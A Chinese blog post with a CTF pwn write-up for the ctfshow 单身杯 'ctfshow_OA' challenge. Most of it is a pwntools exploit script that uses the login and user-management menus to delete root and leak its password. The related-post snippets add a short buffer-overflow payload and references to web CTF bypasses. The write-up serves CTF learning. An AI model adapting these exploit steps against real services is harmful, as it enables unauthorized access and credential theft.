ctfshow | 单身杯dsb | pwn | ctfshow_OA

最新推荐文章于 2023-07-09 23:59:20 发布
最新推荐文章于 2023-07-09 23:59:20 发布
阅读量349 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elg5127/article/details/124916701
版权 
#create user&password -> login -> validate psn session -> delete root -> show root passwd

from pwn import *
p = remote("pwn.challenge.ctf.show",28156)
#-----main -> menu

#-----from main

#-----create_new_user
p.sendline('1')
p.recvuntil('username :')
p.sendline('pwn')#随便取一个名?
#p.sendlineafter('username :','pwn')
p.recvuntil('password :')
p.sendline('A'*0x18)#限制是0x18
#p.sendlineafter('password :','a'*0x18)#change_passwd

#-----login
p.sendline('2')
p.recvuntil('Username :')
p.sendline('pwn')#前面自己取的那个name
#p.sendlineafter('Username : ','pwn')
p.recvuntil('Password :')
p.sendline('A'*1023)#I don't know why
#p.sendlineafter('Password : ',"'a'*1023")这里不能使用sendlineafter

#-----to menu

#-----manage users
p.sendline('3')
#p.recvuntil('modify :')
#p.sendline('pwn')
p.sendlineafter('modify :','pwn')
#p.recvuntil('>')
#p.sendline('3')
p.sendlineafter('>','3')#i=-1 -> print('>') -> end change_user_admin

#-----delete account
p.sendline('4')
#p.recvuntil('delete :')
#p.sendline('root')
p.sendlineafter('delete :','root')

#-----show my data
p.sendline('3')
p.recvuntil("Password : ")
print(p.recv())

#p.close()

\n\nPlease choose an option between the following : \n 
1 : create an user\n 
2 : login\n 
0 : exit\n>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
由此可知,需要执行先创建一个user,然后登录,也就是说要v3 == 1,然后v3 ==2.

Actions :\n 
1 : create new user\n 
2 : list users\n 
3 : manage users\n 
4 : delete account\n 
0 : Logout\n>

"Actions :\n"
          " 1 : show messages\n"
          " 2 : add message\n"
          " 3 : show my data\n"
          " 4 : change password\n"
          " 5 : delete account\n"
          " 0 : Logout\n"
          "> "

"Your account is not activated.\n"
        "Please contact an admin to activate it\n"
        "Actions :\n"
        " 1 : change password\n"
        " 2 : delete account\n"
        " 0 : Logout\n"
        "> "

在这里插入图片描述

Dem1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow单身杯 TooYoungRSA】
chuxuezhewocao的博客
05-28 295
前言 ctfshow单身杯 TooYoungRSA 一、题目分析 nc之后题目给出了个随机数(小于n)加密后的值ck,以及ck经过sha256之后的hex编码(key),后面用到这个key对flag进行AES加密,AES加密部分很好处理,但是关键在于不知道前面RSA加密部分的n和e。根据源码后面我们知道了,我们可以一直输入内容,然后函数返回相同的n和e加密后的值,这里我们可以进行选择明文攻击,得到n和e。 二、公式推导 由题知: k ^ e ≡ c1(mod n) 此时假设我们再输入k^2,得到: (k
dsb.rar_DSB SIMULINK_dsb_generation
09-20
标题中的“dsb.rar_DSB SIMULINK_dsb_generation”暗示了我们正在处理一个与数字双侧带(DSB)信号生成相关的Simulink模型。Simulink是MATLAB的一个扩展,用于创建动态系统的可视化仿真。这个压缩包可能包含了一个用...
ctfshow 单身杯(dsb)
qq_29634299的博客
05-22 1132
OSINT 任性老板 用yandex识图搜到虎扑的关于这个点的信息 https://bbs.hupu.com/27645621.html 通过恢复知道这个店铺的名字叫左撇子私房面 通过百度搜索店面即可获得电话号码 蛤壳雪茄-1 谷歌识图找到原图 知道它是mary river aerodrome这个 搜索得到 搜索这第一个公司的名字即可得到公司网站得到flag re re签到 拖到 IDA中 f5反汇编,看到 if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabU
ctfshow单身
Landasika的博客
05-25 1286
ctfshow单身杯 web1. web签到 题目代码如下: <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);
Ctfshow [单身杯]
记录学习,一起进步
05-11 667
Ctfshow [单身杯]
dsb.rar_MATLAB DSB_dsb_dsb matlab_dsb-ask_dsb-fm
09-14
标题中的"dsb.rar_MATLAB DSB_dsb_dsb matlab_dsb-ask_dsb-fm"揭示了这个压缩包文件是关于使用MATLAB进行DSB(Double-Sideband)信号的仿真,涉及到DSB-ASK(Double-Sideband Amplitude Shift Keying)和DSB-FM...
AM DSB SC.zip_AM_SC_am dsb_dsb_dsb modulation
09-23
标题中的"AM DSB SC.zip_AM_SC_am dsb_dsb_dsb modulation"指的是一个与幅度调制(Amplitude Modulation, AM)相关的压缩文件,特别是双边带抑制载波(Double-Sideband Suppressed Carrier, DSB SC)调制技术。...
MZM_DSB_SSB_DSB_CS.rar_MZM_MZM DSB_Single side band
07-15
标题中的“MZM_DSB_SSB_DSB_CS.rar”指的是一个使用MZM(Mach-Zehnder Modulator,马赫-曾德尔调制器)技术实现不同调制方式的压缩包文件,包括DSB(Double Sideband,双边带)、SSB(Single Sideband,单边带)以及...
Dsb_dem.rar_AM demodulation_DEM_am dsb_dsb
09-21
标题中的"Dsb_dem.rar_AM demodulation_DEM_am dsb_dsb"暗示了这是一个关于模拟双边带(DSB-AM)解调的示例代码,其中"AM"代表幅度调制,"DEMODULATION"指的是解调过程,而"dsb_dsb"可能是对双边带调制的强调。...
[ctfshow 单身杯]web writeup&&学习一下sed awk基本用法
weixin_45751765的博客
06-08 1077
想起来之前比赛撞了 单身杯没打完 刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可 三字长度命令 参数长度任意保证传入字符串参考 sed教程 流程:sed工作流程 sed不用任何语句时可以直接输出源文件内容 本着需要什么学什么的初心 我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用;间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版 将
CTF秀--单身
最新发布
m0_59022585的博客
07-09 186
解压出来还有一个文本文件,打开发现里面没有e,根据上面文本的名字推测文本中的密文就是e(加密的)。得到解压后的文件打开其中的文本文件,根据提示使用敲击码解码,得到压缩包密码(还有一层加密),再根据提示暗示使用九键解密(手搓脚本)得到纯数字密码。根据题目提示是古典base,则尝试使用古典密码进行转换后进行base解密。将得到的密文进行转换(将大写改为小写并在大写字母后面添加一个空格),得到明文。摩斯解密后也进行九键解密得到e。通过图片中的小人可以得知是跳舞的小人密码,对照解密表进行解密。
ctfshow | 单身dsb | pwn | pwn签到
Dem1的博客
05-22 285
from pwn import * p = remote('pwn.challenge.ctf.show',28018) #p =process('./pwn01') shell_here = 0x80484f6 payload = 'a'*(0x10+0x4) + p32(shell_here) p.sendline(payload) p.interactive()
ctfshow单身杯部分wp
m0_62422842的博客
07-09 983
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
CTFshow单身杯 部分wp
Nancy523的博客
05-22 2004
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录1、单身杯热身题目2、misc签到3、没大没小的串串4、任性老板5、蛤壳雪茄-16、蛤壳雪茄-27、The Dancing Men8、伪装成RSA的MUSC9、re签到10、magic 1、单身杯热身题目 应该是后台做了日期相关的验证,反正照常输一个日期不要太离谱的就哦了 2、misc签到 题目提示: 下载附件,ARCHPR爆破所有可打印字符,位数为5位,得到压缩包密码61f@X 010editor打开解压得到的图片可以找到 base6.
ctfshow-单身杯re签到
weixin_61154173的博客
10-11 378
re基础练习
单身杯web wp
GSflyy的博客
07-25 782
若无闲事挂心头,便是人间好时节
单身杯,Web:web签到
Pai_Space
07-15 797
单身杯,Web:web签到
ctfshow单身狗 -- web
cainsoftware的博客
07-21 541
看到入参file判断项是strrev(反转)==正常入参刚开始考虑过弱等于绕过,但是include没啥用,后来了解到2个知识点,,1.第一可以利用data//伪协议,2.php?>后的内容不再进行运算所以可以构造如下file=data?>通过py反转构造完整payload签到题这么难?签到题不应该是有手就行的那种吗。...
__STATIC_INLINE void NVIC_SystemReset(void) { __DSB(); /* Ensure all outstanding memory accesses included buffered write are completed before reset */ SCB->AIRCR = ((0x5FAUL << SCB_AIRCR_VECTKEY_Pos) | SCB_AIRCR_SYSRESETREQ_Msk); __DSB(); /* Ensure completion of memory access */ for(;;) /* wait until reset */ { __NOP(); } }
06-08
这段代码看起来是一个内联函数,函数名为 `NVIC_SystemReset`,作用是进行系统复位。代码中使用了一些特殊的指令和寄存器来实现系统复位。 具体来说,代码首先调用了一个名为 `__DSB` 的函数,用于确保所有未完成的内存访问都已经完成,包括缓存写入等操作。接着,代码向 System Control Block (SCB) 寄存器的 AIRCR 寄存器写入一个特定的值,以触发系统复位。这个特定的值包含了一个 0x5FAUL 的魔数和一个复位请求标志位,用于确保只有在正确的条件下才能进行系统复位。 在触发系统复位后,代码再次调用了 `__DSB` 函数,用于确保内存访问已经完成。接着,代码进入一个死循环,等待系统复位的完成。在死循环中,代码使用了一个空指令 `__NOP()`,用于占用 CPU 的时间,以便等待系统复位的完成。 需要注意的是,这段代码是在 ARM Cortex-M 处理器中使用的,其中 `__DSB` 和 `__NOP` 都是编译器内置的函数,用于进行数据同步和空操作。如果你不了解 ARM Cortex-M 处理器的相关知识,可能需要先了解一下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值